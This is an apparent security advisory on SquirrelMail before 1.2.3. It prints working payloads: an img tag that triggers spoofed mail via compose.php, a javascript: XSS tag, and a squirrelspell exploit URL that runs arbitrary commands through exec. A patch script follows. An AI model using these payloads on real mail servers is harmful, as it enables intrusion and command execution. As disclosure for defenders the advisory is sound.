COMMAND

	SquirrelMail can be fooled to send spoofed messages and java scripts

SYSTEMS AFFECTED

	SquirrelMail < v 1.2.3

PROBLEM

	Tom McAdam posted :
	

	The  compose.php  script  allows  parameters  to  be  passed  as   GETs.
	Therefore including the following in an HTML mail will  send  a  message
	to x@y.com:
	

	<img 

	src=\"compose.php?send_to=x@y.com&subject=foo&bar=bar&send=1\">

	

	The read_body.php script does not check  HTML  tags  for  javascript.  A
	trivial example:
	

	<img src=\"javascript:alert(\'Oh dear\')\">

	

	

	\"appelast\" added :
	

	One of the plugins has a very  interesting  piece  of  code,  from  file
	check_me.mod.php :
	

	$sqspell_command = $SQSPELL_APP[$sqspell_use_app];

	...

	$floc = \"$attachment_dir/$username_sqspell_data.txt\");

	...

	exec (\"cat $floc | $sqspell_command\", $sqspell_output);

	

	Everything should be ok, but where  this  page  includes  config  files,
	where are defined $attachment_dir and others ? Answer: Nowhere.  We  can
	set up variables $sqspell_command and $floc. Result  ?  We  can  execute
	any command of course as a http serwer owner.
	

	Exploit :
	

	host/plugins/squirrelspell/modules/check_me.mod.php?SQSPELL_APP[blah]=wall%

	20hello&sqspell_use_app=blah&attachment_dir=/tmp&username_sqspell_data=plik

	

SOLUTION

	Here is the fix for  the  arbitrary  remote  execution  with  httpd-user
	rights.  Place  this  file  in  the   squirrelmail/plugins/squirrelspell
	directory and execute it to fix the vulnerability.
	

	--- begin sqspell_security_fix.sh ---

	#!/bin/sh

	sed \"s/.mod.php/.mod/g\" sqspell_interface.php > tmp.1

	sed \"s/.mod.php/.mod/g\" sqspell_options.php > tmp.2

	mv -f tmp.1 sqspell_interface.php

	mv -f tmp.2 sqspell_options.php

	cd modules

	for FILE in *.mod.php; do 

	        NEWFILE=`echo $FILE | sed \'s/.php//\'`

	        mv $FILE $NEWFILE

	done

	--- end sqspell_security_fix.sh ---

	

	http://www.dulug.duke.edu/~icon/misc/security_fix.sh.txt

	

	squirrelmail-1.2.4 will contain all fixes